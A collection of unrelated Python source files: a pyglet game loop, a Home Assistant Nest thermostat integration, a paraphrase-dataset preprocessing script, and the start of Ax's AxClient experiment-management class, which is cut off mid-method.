self.pr = cProfile.Profile()
self.pr.enable()
pyglet.gl.glClearColor(.8, .8, .8, 1)
self.alive = True
self.framerate = 0, time()
self.count = 0
self.statemanager = StateManager()
def render(self, *args):
self.statemanager.update()
self.clear()
self.statemanager.draw()
self.flip()
def on_draw(self):
self.render()
def on_close(self):
self.alive = False
# def on_key_press(self, symbol, modkey):
# self.state_manager.current.on_key_press(symbol, modkey)
# def on_key_release(self, symbol, modkey):
# self.state_manager.current.on_key_release(symbol, modkey)
def on_mouse_release(self, x, y, button, modifiers):
self.statemanager.on_mouse_release(x, y, button, modifiers)
def on_mouse_press(self, x, y, button, modifiers):
self.statemanager.on_mouse_press(x, y, button, modifiers)
def on_mouse_motion(self, x, y, dx, dy):
self.statemanager.on_mouse_motion(x, y, dx, dy)
def on_mouse_drag(self, x, y, dx, dy, buttons, modifiers):
self.statemanager.on_mouse_drag(x, y, dx, dy, buttons, modifiers)
def on_mouse_scroll(self, x, y, scroll_x, scroll_y):
self.statemanager.on_mouse_scroll(x, y, scroll_x, scroll_y)
def run(self):
while self.alive:
event = self.dispatch_events()
if event:
print(event)
self.render()
game = Game(window_height, window_width)
if __name__ == '__main__':
pyglet.clock.set_fps_limit(10)
game.run()
|
the-stack_106_16859
|
"""
Support for Nest thermostats.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/climate.nest/
"""
import logging
import voluptuous as vol
from homeassistant.components.nest import DATA_NEST, SIGNAL_NEST_UPDATE
from homeassistant.components.climate import (
STATE_AUTO, STATE_COOL, STATE_HEAT, STATE_ECO, ClimateDevice,
PLATFORM_SCHEMA, ATTR_TARGET_TEMP_HIGH, ATTR_TARGET_TEMP_LOW,
ATTR_TEMPERATURE, SUPPORT_TARGET_TEMPERATURE,
SUPPORT_TARGET_TEMPERATURE_HIGH, SUPPORT_TARGET_TEMPERATURE_LOW,
SUPPORT_OPERATION_MODE, SUPPORT_AWAY_MODE, SUPPORT_FAN_MODE)
from homeassistant.const import (
TEMP_CELSIUS, TEMP_FAHRENHEIT,
CONF_SCAN_INTERVAL, STATE_ON, STATE_OFF, STATE_UNKNOWN)
from homeassistant.helpers.dispatcher import async_dispatcher_connect
DEPENDENCIES = ['nest']
_LOGGER = logging.getLogger(__name__)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_SCAN_INTERVAL):
vol.All(vol.Coerce(int), vol.Range(min=1)),
})
NEST_MODE_HEAT_COOL = 'heat-cool'
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up the Nest thermostat.
No longer in use.
"""
async def async_setup_entry(hass, entry, async_add_devices):
"""Set up the Nest climate device based on a config entry."""
temp_unit = hass.config.units.temperature_unit
thermostats = await hass.async_add_job(hass.data[DATA_NEST].thermostats)
all_devices = [NestThermostat(structure, device, temp_unit)
for structure, device in thermostats]
async_add_devices(all_devices, True)
class NestThermostat(ClimateDevice):
"""Representation of a Nest thermostat."""
def __init__(self, structure, device, temp_unit):
"""Initialize the thermostat."""
self._unit = temp_unit
self.structure = structure
self._device = device
self._fan_list = [STATE_ON, STATE_AUTO]
# Set the default supported features
self._support_flags = (SUPPORT_TARGET_TEMPERATURE |
SUPPORT_OPERATION_MODE | SUPPORT_AWAY_MODE)
# Not all nest devices support cooling and heating remove unused
self._operation_list = [STATE_OFF]
# Add supported nest thermostat features
if self._device.can_heat:
self._operation_list.append(STATE_HEAT)
if self._device.can_cool:
self._operation_list.append(STATE_COOL)
if self._device.can_heat and self._device.can_cool:
self._operation_list.append(STATE_AUTO)
self._support_flags = (self._support_flags |
SUPPORT_TARGET_TEMPERATURE_HIGH |
SUPPORT_TARGET_TEMPERATURE_LOW)
self._operation_list.append(STATE_ECO)
# feature of device
self._has_fan = self._device.has_fan
if self._has_fan:
self._support_flags = (self._support_flags | SUPPORT_FAN_MODE)
# data attributes
self._away = None
self._location = None
self._name = None
self._humidity = None
self._target_temperature = None
self._temperature = None
self._temperature_scale = None
self._mode = None
self._fan = None
self._eco_temperature = None
self._is_locked = None
self._locked_temperature = None
self._min_temperature = None
self._max_temperature = None
@property
def should_poll(self):
"""Do not need poll thanks using Nest streaming API."""
return False
async def async_added_to_hass(self):
"""Register update signal handler."""
async def async_update_state():
"""Update device state."""
await self.async_update_ha_state(True)
async_dispatcher_connect(self.hass, SIGNAL_NEST_UPDATE,
async_update_state)
@property
def supported_features(self):
"""Return the list of supported features."""
return self._support_flags
@property
def unique_id(self):
"""Return unique ID for this device."""
return self._device.serial
@property
def name(self):
"""Return the name of the nest, if any."""
return self._name
@property
def temperature_unit(self):
"""Return the unit of measurement."""
return self._temperature_scale
@property
def current_temperature(self):
"""Return the current temperature."""
return self._temperature
@property
def current_operation(self):
"""Return current operation ie. heat, cool, idle."""
if self._mode in [STATE_HEAT, STATE_COOL, STATE_OFF, STATE_ECO]:
return self._mode
if self._mode == NEST_MODE_HEAT_COOL:
return STATE_AUTO
return STATE_UNKNOWN
@property
def target_temperature(self):
"""Return the temperature we try to reach."""
if self._mode != NEST_MODE_HEAT_COOL and \
self._mode != STATE_ECO and \
not self.is_away_mode_on:
return self._target_temperature
return None
@property
def target_temperature_low(self):
"""Return the lower bound temperature we try to reach."""
if (self.is_away_mode_on or self._mode == STATE_ECO) and \
self._eco_temperature[0]:
# eco_temperature is always a low, high tuple
return self._eco_temperature[0]
if self._mode == NEST_MODE_HEAT_COOL:
return self._target_temperature[0]
return None
@property
def target_temperature_high(self):
"""Return the upper bound temperature we try to reach."""
if (self.is_away_mode_on or self._mode == STATE_ECO) and \
self._eco_temperature[1]:
# eco_temperature is always a low, high tuple
return self._eco_temperature[1]
if self._mode == NEST_MODE_HEAT_COOL:
return self._target_temperature[1]
return None
@property
def is_away_mode_on(self):
"""Return if away mode is on."""
return self._away
def set_temperature(self, **kwargs):
"""Set new target temperature."""
import nest
temp = None
target_temp_low = kwargs.get(ATTR_TARGET_TEMP_LOW)
target_temp_high = kwargs.get(ATTR_TARGET_TEMP_HIGH)
if self._mode == NEST_MODE_HEAT_COOL:
if target_temp_low is not None and target_temp_high is not None:
temp = (target_temp_low, target_temp_high)
_LOGGER.debug("Nest set_temperature-output-value=%s", temp)
else:
temp = kwargs.get(ATTR_TEMPERATURE)
_LOGGER.debug("Nest set_temperature-output-value=%s", temp)
try:
if temp is not None:
self._device.target = temp
except nest.nest.APIError as api_error:
_LOGGER.error("An error occurred while setting temperature: %s",
api_error)
# restore target temperature
self.schedule_update_ha_state(True)
def set_operation_mode(self, operation_mode):
"""Set operation mode."""
if operation_mode in [STATE_HEAT, STATE_COOL, STATE_OFF, STATE_ECO]:
device_mode = operation_mode
elif operation_mode == STATE_AUTO:
device_mode = NEST_MODE_HEAT_COOL
else:
device_mode = STATE_OFF
_LOGGER.error(
"An error occurred while setting device mode. "
"Invalid operation mode: %s", operation_mode)
self._device.mode = device_mode
@property
def operation_list(self):
"""List of available operation modes."""
return self._operation_list
def turn_away_mode_on(self):
"""Turn away on."""
self.structure.away = True
def turn_away_mode_off(self):
"""Turn away off."""
self.structure.away = False
@property
def current_fan_mode(self):
"""Return whether the fan is on."""
if self._has_fan:
# Return whether the fan is on
return STATE_ON if self._fan else STATE_AUTO
# No Fan available so disable slider
return None
@property
def fan_list(self):
"""List of available fan modes."""
if self._has_fan:
return self._fan_list
return None
def set_fan_mode(self, fan_mode):
"""Turn fan on/off."""
if self._has_fan:
self._device.fan = fan_mode.lower()
@property
def min_temp(self):
"""Identify min_temp in Nest API or defaults if not available."""
return self._min_temperature
@property
def max_temp(self):
"""Identify max_temp in Nest API or defaults if not available."""
return self._max_temperature
def update(self):
"""Cache value from Python-nest."""
self._location = self._device.where
self._name = self._device.name
self._humidity = self._device.humidity
self._temperature = self._device.temperature
self._mode = self._device.mode
self._target_temperature = self._device.target
self._fan = self._device.fan
self._away = self.structure.away == 'away'
self._eco_temperature = self._device.eco_temperature
self._locked_temperature = self._device.locked_temperature
self._min_temperature = self._device.min_temperature
self._max_temperature = self._device.max_temperature
self._is_locked = self._device.is_locked
if self._device.temperature_scale == 'C':
self._temperature_scale = TEMP_CELSIUS
else:
self._temperature_scale = TEMP_FAHRENHEIT
|
the-stack_106_16866
|
import os
import random
import argparse
import torch
import numpy as np
import Core.Constants as Constants
from Core.Utils import build_vocab_idx, convert_instance_to_idx_seq,\
set_seed_everywhere
from Core.Dataset import read_instances_from_file
def parse_args():
"""
Wrapper function of argument parsing process.
"""
parser = argparse.ArgumentParser()
parser.add_argument(
'--data_dir', type=str, default=os.path.join(Constants.DATA_PATH, 'paraphrase/integrated.txt'),
help='dataset location.'
)
parser.add_argument(
'--model_dir', type=str, default=os.path.join(Constants.MODEL_PATH, 'm.para.16000.model'),
help='bpe model location.'
)
parser.add_argument(
'--ori_save_dir', type=str, default=os.path.join(Constants.TRAIN_PATH, 'para_train_ori.pt'),
help='source training data save location.'
)
parser.add_argument(
'--ref_save_dir', type=str, default=os.path.join(Constants.TRAIN_PATH, 'para_train_ref.pt'),
help='reference training data save location.'
)
parser.add_argument(
'--dict_save_dir', type=str, default=os.path.join(Constants.TRAIN_PATH, 'para_train_dict.pt'),
help='token to index dictionary save location.'
)
parser.add_argument(
'--max_txt_len', type=int, default=50, help='maximum sentence length'
)
parser.add_argument(
'--max_syn_len', type=int, default=50, help='maximum constituency parse length'
)
parser.add_argument(
'--max_src_depth', type=int, default=8, help='maximum constituency parse tree depth'
)
parser.add_argument(
'--max_tmpl_depth', type=int, default=3, help='maximum template parse tree depth'
)
parser.add_argument(
'--min_txt_len', type=int, default=3, help='minimum sentence length'
)
parser.add_argument(
'--min_syn_len', type=int, default=3, help='minimum constituency parse length'
)
parser.add_argument(
'--min_token_count', type=int, default=0, help='minimum appearance time of a token to be registered'
)
parser.add_argument(
'--train_ratio', type=float, default=0.9, help='ratio of instances used for training'
)
parser.add_argument(
'--keep_case', type=bool, default=False, help='whether keep the original case of a word'
)
parser.add_argument(
'--n_lines', type=int, default=np.inf, help='how many lines are going to be used for training and validation'
)
parser.add_argument(
'--random_seed', type=int, default=42
)
args = parser.parse_args()
return args
def main():
""" Main function """
args = parse_args()
set_seed_everywhere(args.random_seed, False)
# Training set
txt_ori, src_syn_ori, src_lvl_ori, tmpl_syn_ori, tmpl_lvl_ori, \
txt_ref, src_syn_ref, src_lvl_ref, tmpl_syn_ref, tmpl_lvl_ref, \
src_tree_path_ori, src_tree_path_ref, tmpl_tree_path_ori, tmpl_tree_path_ref = \
read_instances_from_file(
data_file=args.data_dir,
model_file=args.model_dir,
max_txt_len=args.max_txt_len,
src_syn_depth=args.max_src_depth,
tmpl_syn_depth=args.max_tmpl_depth,
max_syn_len=args.max_syn_len,
min_txt_len=args.min_txt_len,
min_syn_len=args.min_syn_len,
n_lines=args.n_lines,
use_fixed_level=True
)
assert len(txt_ori) == len(src_syn_ori) == len(src_lvl_ori) == \
len(txt_ref) == len(src_syn_ref) == len(src_lvl_ref) == \
len(tmpl_syn_ori) == len(tmpl_lvl_ori) == len(tmpl_syn_ref) == len(tmpl_lvl_ref) == \
len(src_tree_path_ori) == len(src_tree_path_ref) == len(tmpl_tree_path_ori) == len(tmpl_tree_path_ref)
args.max_txt_token_len = max([len(s) for s in txt_ori + txt_ref])
args.max_syn_token_len = max([len(s) for s in src_syn_ori + src_syn_ref])
# shuffle data
data_bag = list(zip(
txt_ori, src_syn_ori, src_lvl_ori, tmpl_syn_ori, tmpl_lvl_ori,
txt_ref, src_syn_ref, src_lvl_ref, tmpl_syn_ref, tmpl_lvl_ref,
src_tree_path_ori, src_tree_path_ref, tmpl_tree_path_ori, tmpl_tree_path_ref
))
random.shuffle(data_bag)
txt_ori, src_syn_ori, src_lvl_ori, tmpl_syn_ori, tmpl_lvl_ori, \
txt_ref, src_syn_ref, src_lvl_ref, tmpl_syn_ref, tmpl_lvl_ref, \
src_tree_path_ori, src_tree_path_ref, tmpl_tree_path_ori, tmpl_tree_path_ref = zip(*data_bag)
if os.path.exists(args.dict_save_dir):
print('[Info] Loading word indices')
w2i = torch.load(args.dict_save_dir)
txt_word2idx = w2i['text']
syn_word2idx = w2i['syntax']
lvl_word2idx = w2i['level']
else:
print('[Info] Indexing words.')
txt_word2idx = build_vocab_idx(txt_ori + txt_ref)
syn_word2idx = build_vocab_idx(src_syn_ori + src_syn_ref)
lvl_word2idx = build_vocab_idx(src_lvl_ori + src_lvl_ref)
n_train_inst = int(round(args.train_ratio * len(txt_ori)))
train_txt_ori = txt_ori[:n_train_inst]
valid_txt_ori = txt_ori[n_train_inst:]
train_src_syn_ori = src_syn_ori[:n_train_inst]
valid_src_syn_ori = src_syn_ori[n_train_inst:]
train_src_lvl_ori = src_lvl_ori[:n_train_inst]
valid_src_lvl_ori = src_lvl_ori[n_train_inst:]
train_tmpl_syn_ori = tmpl_syn_ori[:n_train_inst]
valid_tmpl_syn_ori = tmpl_syn_ori[n_train_inst:]
train_tmpl_lvl_ori = tmpl_lvl_ori[:n_train_inst]
valid_tmpl_lvl_ori = tmpl_lvl_ori[n_train_inst:]
train_src_path_ori = src_tree_path_ori[:n_train_inst]
valid_src_path_ori = src_tree_path_ori[n_train_inst:]
train_tmpl_path_ori = tmpl_tree_path_ori[:n_train_inst]
valid_tmpl_path_ori = tmpl_tree_path_ori[n_train_inst:]
train_txt_ref = txt_ref[:n_train_inst]
valid_txt_ref = txt_ref[n_train_inst:]
train_src_syn_ref = src_syn_ref[:n_train_inst]
valid_src_syn_ref = src_syn_ref[n_train_inst:]
train_src_lvl_ref = src_lvl_ref[:n_train_inst]
valid_src_lvl_ref = src_lvl_ref[n_train_inst:]
train_tmpl_syn_ref = tmpl_syn_ref[:n_train_inst]
valid_tmpl_syn_ref = tmpl_syn_ref[n_train_inst:]
train_tmpl_lvl_ref = tmpl_lvl_ref[:n_train_inst]
valid_tmpl_lvl_ref = tmpl_lvl_ref[n_train_inst:]
train_src_path_ref = src_tree_path_ref[:n_train_inst]
valid_src_path_ref = src_tree_path_ref[n_train_inst:]
train_tmpl_path_ref = tmpl_tree_path_ref[:n_train_inst]
valid_tmpl_path_ref = tmpl_tree_path_ref[n_train_inst:]
# word to index
print('[Info] Converting instances into sequences of word index.')
train_txt_ori = convert_instance_to_idx_seq(train_txt_ori, txt_word2idx)
valid_txt_ori = convert_instance_to_idx_seq(valid_txt_ori, txt_word2idx)
train_src_syn_ori = convert_instance_to_idx_seq(train_src_syn_ori, syn_word2idx)
valid_src_syn_ori = convert_instance_to_idx_seq(valid_src_syn_ori, syn_word2idx)
train_src_lvl_ori = convert_instance_to_idx_seq(train_src_lvl_ori, lvl_word2idx)
valid_src_lvl_ori = convert_instance_to_idx_seq(valid_src_lvl_ori, lvl_word2idx)
train_tmpl_syn_ori = convert_instance_to_idx_seq(train_tmpl_syn_ori, syn_word2idx)
valid_tmpl_syn_ori = convert_instance_to_idx_seq(valid_tmpl_syn_ori, syn_word2idx)
train_tmpl_lvl_ori = convert_instance_to_idx_seq(train_tmpl_lvl_ori, lvl_word2idx)
valid_tmpl_lvl_ori = convert_instance_to_idx_seq(valid_tmpl_lvl_ori, lvl_word2idx)
train_txt_ref = convert_instance_to_idx_seq(train_txt_ref, txt_word2idx)
valid_txt_ref = convert_instance_to_idx_seq(valid_txt_ref, txt_word2idx)
train_src_syn_ref = convert_instance_to_idx_seq(train_src_syn_ref, syn_word2idx)
valid_src_syn_ref = convert_instance_to_idx_seq(valid_src_syn_ref, syn_word2idx)
train_src_lvl_ref = convert_instance_to_idx_seq(train_src_lvl_ref, lvl_word2idx)
valid_src_lvl_ref = convert_instance_to_idx_seq(valid_src_lvl_ref, lvl_word2idx)
train_tmpl_syn_ref = convert_instance_to_idx_seq(train_tmpl_syn_ref, syn_word2idx)
valid_tmpl_syn_ref = convert_instance_to_idx_seq(valid_tmpl_syn_ref, syn_word2idx)
train_tmpl_lvl_ref = convert_instance_to_idx_seq(train_tmpl_lvl_ref, lvl_word2idx)
valid_tmpl_lvl_ref = convert_instance_to_idx_seq(valid_tmpl_lvl_ref, lvl_word2idx)
data_ori = {
'settings': args,
'train': {
'text': train_txt_ori,
'src_syntax': train_src_syn_ori,
'src_level': train_src_lvl_ori,
'src_path': train_src_path_ori,
'tmpl_syntax': train_tmpl_syn_ori,
'tmpl_level': train_tmpl_lvl_ori,
'tmpl_path': train_tmpl_path_ori,
},
'valid': {
'text': valid_txt_ori,
'src_syntax': valid_src_syn_ori,
'src_level': valid_src_lvl_ori,
'src_path': valid_src_path_ori,
'tmpl_syntax': valid_tmpl_syn_ori,
'tmpl_level': valid_tmpl_lvl_ori,
'tmpl_path': valid_tmpl_path_ori,
}
}
data_ref = {
'settings': args,
'train': {
'text': train_txt_ref,
'src_syntax': train_src_syn_ref,
'src_level': train_src_lvl_ref,
'src_path': train_src_path_ref,
'tmpl_syntax': train_tmpl_syn_ref,
'tmpl_level': train_tmpl_lvl_ref,
'tmpl_path': train_tmpl_path_ref,
},
'valid': {
'text': valid_txt_ref,
'src_syntax': valid_src_syn_ref,
'src_level': valid_src_lvl_ref,
'src_path': valid_src_path_ref,
'tmpl_syntax': valid_tmpl_syn_ref,
'tmpl_level': valid_tmpl_lvl_ref,
'tmpl_path': valid_tmpl_path_ref,
}
}
w2i_dict = {
'settings': args,
'text': txt_word2idx,
'syntax': syn_word2idx,
'level': lvl_word2idx
}
print('[Info] Dumping the processed data to pickle file')
torch.save(data_ori, args.ori_save_dir)
torch.save(data_ref, args.ref_save_dir)
torch.save(w2i_dict, args.dict_save_dir)
print('[Info] Finished.')
if __name__ == '__main__':
main()
|
the-stack_106_16869
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import json
import logging
import warnings
from typing import Any, Dict, List, Optional, Tuple, Union
import ax.service.utils.best_point as best_point_utils
import numpy as np
import pandas as pd
from ax.core.arm import Arm
from ax.core.data import Data
from ax.core.experiment import Experiment
from ax.core.generator_run import GeneratorRun
from ax.core.trial import Trial
from ax.core.types import (
TEvaluationOutcome,
TModelPredictArm,
TParameterization,
TParamValue,
)
from ax.modelbridge.dispatch_utils import choose_generation_strategy
from ax.modelbridge.generation_strategy import GenerationStrategy
from ax.modelbridge.modelbridge_utils import get_pending_observation_features
from ax.plot.base import AxPlotConfig
from ax.plot.contour import plot_contour
from ax.plot.exp_utils import exp_to_df
from ax.plot.helper import _format_dict, _get_in_sample_arms
from ax.plot.trace import optimization_trace_single_method
from ax.service.utils.instantiation import (
data_from_evaluations,
make_experiment,
raw_data_to_evaluation,
)
from ax.service.utils.storage import (
load_experiment_and_generation_strategy,
save_experiment_and_generation_strategy,
)
from ax.storage.json_store.decoder import (
generation_strategy_from_json,
object_from_json,
)
from ax.storage.json_store.encoder import object_to_json
from ax.utils.common.docutils import copy_doc
from ax.utils.common.logger import _round_floats_for_logging, get_logger
from ax.utils.common.typeutils import (
checked_cast,
checked_cast_dict,
checked_cast_optional,
not_none,
)
from botorch.utils.sampling import manual_seed
logger = get_logger(__name__)
try: # We don't require SQLAlchemy by default.
from ax.storage.sqa_store.structs import DBSettings
except ModuleNotFoundError: # pragma: no cover
DBSettings = None
class AxClient:
"""
Convenience handler for management of experimentation cycle through a
service-like API. External system manages scheduling of the cycle and makes
calls to this client to get next suggestion in the experiment and log back
data from the evaluation of that suggestion.
Note: `AxClient` expects to only propose 1 arm (suggestion) per trial; support
for use cases that require use of batches is coming soon.
Two custom types used in this class for convenience are `TParamValue` and
`TParameterization`. Those are shortcuts for `Union[str, bool, float, int]`
and `Dict[str, Union[str, bool, float, int]]`, respectively.
Args:
generation_strategy: Optional generation strategy. If not set, one is
intelligently chosen based on properties of search space.
db_settings: Settings for saving and reloading the underlying experiment
to a database. Expected to be of type
ax.storage.sqa_store.structs.DBSettings and require SQLAlchemy.
enforce_sequential_optimization: Whether to enforce that when it is
reasonable to switch models during the optimization (as prescribed
by `num_arms` in generation strategy), Ax will wait for enough trials
to be completed with data to proceed. Defaults to True. If set to
False, Ax will keep generating new trials from the previous model
until enough data is gathered. Use this only if necessary;
otherwise, it is more resource-efficient to
optimize sequentially, by waiting until enough data is available to
use the next model.
random_seed: Optional integer random seed, set to fix the optimization
random seed for reproducibility. Works only for Sobol quasi-random
generator and for BoTorch-powered models. For the latter models, the
trials generated from the same optimization setup with the same seed,
will be mostly similar, but the exact parameter values may still vary
and trials latter in the optimizations will diverge more and more.
This is because a degree of randomness is essential for high performance
of the Bayesian optimization models and is not controlled by the seed.
Note: In multi-threaded environments, the random seed is thread-safe,
but does not actually guarantee reproducibility. Whether the outcomes
will be exactly the same for two same operations that use the random
seed, depends on whether the threads modify the random state in the
same order across the two operations.
verbose_logging: Whether Ax should log significant optimization events,
defaults to `True`.
"""
def __init__(
self,
generation_strategy: Optional[GenerationStrategy] = None,
db_settings: Any = None,
enforce_sequential_optimization: bool = True,
random_seed: Optional[int] = None,
verbose_logging: bool = True,
) -> None:
if not verbose_logging:
logger.setLevel(logging.WARNING)
else:
logger.info(
"Starting optimization with verbose logging. To disable logging, "
"set the `verbose_logging` argument to `False`. Note that float "
"values in the logs are rounded to 2 decimal points."
)
self._generation_strategy = generation_strategy
if db_settings and (not DBSettings or not isinstance(db_settings, DBSettings)):
raise ValueError(
"`db_settings` argument should be of type ax.storage.sqa_store."
"structs.DBSettings. To use `DBSettings`, you will need SQLAlchemy "
"installed in your environment (can be installed through pip)."
)
self.db_settings = db_settings
self._experiment: Optional[Experiment] = None
self._enforce_sequential_optimization = enforce_sequential_optimization
self._random_seed = random_seed
if random_seed is not None:
logger.warning(
f"Random seed set to {random_seed}. Note that this setting "
"only affects the Sobol quasi-random generator "
"and BoTorch-powered Bayesian optimization models. For the latter "
"models, setting random seed to the same number for two optimizations "
"will make the generated trials similar, but not exactly the same, "
"and over time the trials will diverge more."
)
# Trials, for which we received data since last `GenerationStrategy.gen`,
# used to make sure that generation strategy is updated with new data.
self._updated_trials: List[int] = []
# ------------------------ Public API methods. ------------------------
def create_experiment(
self,
parameters: List[Dict[str, Union[TParamValue, List[TParamValue]]]],
name: Optional[str] = None,
objective_name: Optional[str] = None,
minimize: bool = False,
parameter_constraints: Optional[List[str]] = None,
outcome_constraints: Optional[List[str]] = None,
status_quo: Optional[TParameterization] = None,
overwrite_existing_experiment: bool = False,
experiment_type: Optional[str] = None,
) -> None:
"""Create a new experiment and save it if DBSettings available.
Args:
parameters: List of dictionaries representing parameters in the
experiment search space. Required elements in the dictionaries
are: "name" (name of this parameter, string), "type" (type of the
parameter: "range", "fixed", or "choice", string), and "bounds"
for range parameters (list of two values, lower bound first),
"values" for choice parameters (list of values), and "value" for
fixed parameters (single value).
objective: Name of the metric used as objective in this experiment.
This metric must be present in `raw_data` argument to `complete_trial`.
name: Name of the experiment to be created.
minimize: Whether this experiment represents a minimization problem.
parameter_constraints: List of string representation of parameter
constraints, such as "x3 >= x4" or "x3 + x4 + x5 >= 2". For sum
constraints, any number of arguments is accepted, and acceptable
operators are "<=" and ">=".
outcome_constraints: List of string representation of outcome
constraints of form "metric_name >= bound", like "m1 <= 3."
status_quo: Parameterization of the current state of the system.
If set, this will be added to each trial to be evaluated alongside
test configurations.
overwrite_existing_experiment: If `DBSettings` were provided on
instantiation and the experiment being created has the same name
as some experiment already stored, whether to overwrite the
existing experiment. Defaults to False.
"""
if self.db_settings and not name:
raise ValueError( # pragma: no cover
"Must give the experiment a name if `db_settings` is not None."
)
if self.db_settings:
existing = None
try:
existing, _ = load_experiment_and_generation_strategy(
experiment_name=not_none(name), db_settings=self.db_settings
)
except ValueError: # Experiment does not exist, nothing to do.
pass
if existing and overwrite_existing_experiment:
logger.info(f"Overwriting existing experiment {name}.")
elif existing:
raise ValueError(
f"Experiment {name} exists; set the `overwrite_existing_"
"experiment` to `True` to overwrite with new experiment "
"or use `ax_client.load_experiment_from_database` to "
"continue an existing experiment."
)
self._experiment = make_experiment(
name=name,
parameters=parameters,
objective_name=objective_name,
minimize=minimize,
parameter_constraints=parameter_constraints,
outcome_constraints=outcome_constraints,
status_quo=status_quo,
experiment_type=experiment_type,
)
if self._generation_strategy is None:
self._generation_strategy = choose_generation_strategy(
search_space=self._experiment.search_space,
enforce_sequential_optimization=self._enforce_sequential_optimization,
random_seed=self._random_seed,
)
self._save_experiment_and_generation_strategy_to_db_if_possible(
overwrite_existing_experiment=True
)
def get_next_trial(self) -> Tuple[TParameterization, int]:
"""
Generate trial with the next set of parameters to try in the iteration process.
Note: Service API currently supports only 1-arm trials.
Returns:
Tuple of trial parameterization, trial index
"""
trial = self.experiment.new_trial(generator_run=self._gen_new_generator_run())
logger.info(
f"Generated new trial {trial.index} with parameters "
f"{_round_floats_for_logging(item=not_none(trial.arm).parameters)}."
)
trial.mark_dispatched()
self._updated_trials = []
self._save_experiment_and_generation_strategy_to_db_if_possible()
return not_none(trial.arm).parameters, trial.index
def complete_trial(
self,
trial_index: int,
raw_data: TEvaluationOutcome,
metadata: Optional[Dict[str, Union[str, int]]] = None,
sample_size: Optional[int] = None,
) -> None:
"""
Completes the trial with given metric values and adds optional metadata
to it.
Args:
trial_index: Index of trial within the experiment.
raw_data: Evaluation data for the trial. Can be a mapping from
metric name to a tuple of mean and SEM, just a tuple of mean and
SEM if only one metric in optimization, or just the mean if there
is no SEM. Can also be a list of (fidelities, mapping from
metric name to a tuple of mean and SEM).
metadata: Additional metadata to track about this run.
sample_size: Number of samples collected for the underlying arm,
optional.
"""
assert isinstance(
trial_index, int
), f"Trial index must be an int, got: {trial_index}." # pragma: no cover
trial = self._get_trial(trial_index=trial_index)
if metadata is not None:
trial._run_metadata = metadata
arm_name = not_none(trial.arm).name
evaluations = {
arm_name: raw_data_to_evaluation(
raw_data=raw_data, objective_name=self.objective_name
)
}
sample_sizes = {arm_name: sample_size} if sample_size else {}
data = data_from_evaluations(
evaluations=evaluations,
trial_index=trial.index,
sample_sizes=sample_sizes,
start_time=(
checked_cast_optional(int, metadata.get("start_time"))
if metadata is not None
else None
),
end_time=(
checked_cast_optional(int, metadata.get("end_time"))
if metadata is not None
else None
),
)
# In service API, a trial may be completed multiple times (for multiple
# metrics, for example).
trial.mark_completed(allow_repeat_completion=True)
self.experiment.attach_data(data)
data_for_logging = _round_floats_for_logging(
item=evaluations[next(iter(evaluations.keys()))]
)
logger.info(
f"Completed trial {trial_index} with data: "
f"{_round_floats_for_logging(item=data_for_logging)}."
)
self._updated_trials.append(trial_index)
self._save_experiment_and_generation_strategy_to_db_if_possible()
def log_trial_failure(
self, trial_index: int, metadata: Optional[Dict[str, str]] = None
) -> None:
"""Mark that the given trial has failed while running.
Args:
trial_index: Index of trial within the experiment.
metadata: Additional metadata to track about this run.
"""
trial = self.experiment.trials[trial_index]
trial.mark_failed()
logger.info(f"Registered failure of trial {trial_index}.")
if metadata is not None:
trial._run_metadata = metadata
self._save_experiment_and_generation_strategy_to_db_if_possible()
def attach_trial(
self, parameters: TParameterization
) -> Tuple[TParameterization, int]:
"""Attach a new trial with the given parameterization to the experiment.
Args:
parameters: Parameterization of the new trial.
Returns:
Tuple of parameterization and trial index from newly created trial.
"""
trial = self.experiment.new_trial().add_arm(Arm(parameters=parameters))
trial.mark_dispatched()
logger.info(
"Attached custom parameterization "
f"{_round_floats_for_logging(item=parameters)} as trial {trial.index}."
)
self._save_experiment_and_generation_strategy_to_db_if_possible()
return not_none(trial.arm).parameters, trial.index
def get_trial_parameters(self, trial_index: int) -> TParameterization:
"""Retrieve the parameterization of the trial by the given index."""
return not_none(self._get_trial(trial_index).arm).parameters
@copy_doc(best_point_utils.get_best_parameters)
def get_best_parameters(
self
) -> Optional[Tuple[TParameterization, Optional[TModelPredictArm]]]:
return best_point_utils.get_best_parameters(self.experiment)
def get_trials_data_frame(self) -> pd.DataFrame:
return exp_to_df(exp=self.experiment)
def get_recommended_max_parallelism(self) -> List[Tuple[int, int]]:
"""Recommends maximum number of trials that can be scheduled in parallel
at different stages of optimization.
Some optimization algorithms profit significantly from sequential
optimization (e.g. suggest a few points, get updated with data for them,
repeat). This setting indicates how many trials should be in flight
(generated, but not yet completed with data).
The output of this method is mapping of form
{num_trials -> max_parallelism_setting}, where the max_parallelism_setting
is used for num_trials trials. If max_parallelism_setting is -1, as
many of the trials can be ran in parallel, as necessary. If num_trials
in a tuple is -1, then the corresponding max_parallelism_setting
should be used for all subsequent trials.
For example, if the returned list is [(5, -1), (12, 6), (-1, 3)],
the schedule could be: run 5 trials in parallel, run 6 trials in
parallel twice, run 3 trials in parallel for as long as needed. Here,
'running' a trial means obtaining a next trial from `AxClient` through
get_next_trials and completing it with data when available.
Returns:
Mapping of form {num_trials -> max_parallelism_setting}.
"""
parallelism_settings = []
for step in self.generation_strategy._steps:
parallelism_settings.append(
(step.num_arms, step.recommended_max_parallelism or step.num_arms)
)
return parallelism_settings
def get_optimization_trace(
self, objective_optimum: Optional[float] = None
) -> AxPlotConfig:
"""Retrieves the plot configuration for optimization trace, which shows
the evolution of the objective mean over iterations.
Args:
objective_optimum: Optimal objective, if known, for display in the
visualization.
"""
if not self.experiment.trials:
raise ValueError("Cannot generate plot as there are no trials.")
objective_name = self.experiment.optimization_config.objective.metric.name
best_objectives = np.array(
[
[
checked_cast(Trial, trial).objective_mean
for trial in self.experiment.trials.values()
]
]
)
hover_labels = [
_format_dict(not_none(checked_cast(Trial, trial).arm).parameters)
for trial in self.experiment.trials.values()
]
return optimization_trace_single_method(
y=(
np.minimum.accumulate(best_objectives, axis=1)
if self.experiment.optimization_config.objective.minimize
else np.maximum.accumulate(best_objectives, axis=1)
),
optimum=objective_optimum,
title="Model performance vs. # of iterations",
ylabel=objective_name.capitalize(),
hover_labels=hover_labels,
)
def get_contour_plot(
self,
param_x: Optional[str] = None,
param_y: Optional[str] = None,
metric_name: Optional[str] = None,
